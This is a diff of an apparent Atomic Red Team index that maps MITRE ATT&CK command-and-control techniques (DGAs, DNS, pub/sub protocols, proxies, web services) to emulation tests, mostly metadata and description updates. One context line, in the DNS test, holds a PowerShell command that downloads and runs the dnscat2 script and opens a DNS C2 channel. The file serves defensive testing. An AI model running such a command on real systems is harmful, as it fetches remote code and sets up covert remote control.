-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -75242,7 +75665,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests:
     - name: DNS Large Query Volume
@@ -75369,6 +75791,65 @@ command-and-control:
           IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
           Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
         name: powershell
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -75414,7 +75895,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -75446,7 +75926,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -75468,22 +75948,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -75505,7 +75983,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -75530,7 +76008,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests:
     - name: Telnet C2
@@ -75652,7 +76129,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests:
     - name: TeamViewer Files Detected Test on Windows
@@ -76106,11 +76582,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -76194,7 +76669,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -76225,7 +76699,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -76245,8 +76719,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -76268,8 +76742,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests:
     - name: DNS over HTTPS Large Query Volume
@@ -76483,7 +76955,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -76531,7 +77002,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -76585,7 +77055,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -76618,7 +77087,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -76638,8 +77107,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -76677,7 +77144,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -76705,42 +77172,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -76749,17 +77196,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -76791,7 +77260,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -76808,8 +77277,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -76829,7 +77296,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -76852,8 +77319,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -76878,7 +77343,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -76903,8 +77368,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -76969,7 +77432,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -76993,7 +77455,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -77018,21 +77480,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -77051,7 +77528,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -77065,6 +77542,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -77078,7 +77560,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests:
     - name: Psiphon
@@ -77219,7 +77700,7 @@ command-and-control:
         name: sh
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -77269,11 +77750,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -77282,20 +77762,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -77320,17 +77800,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
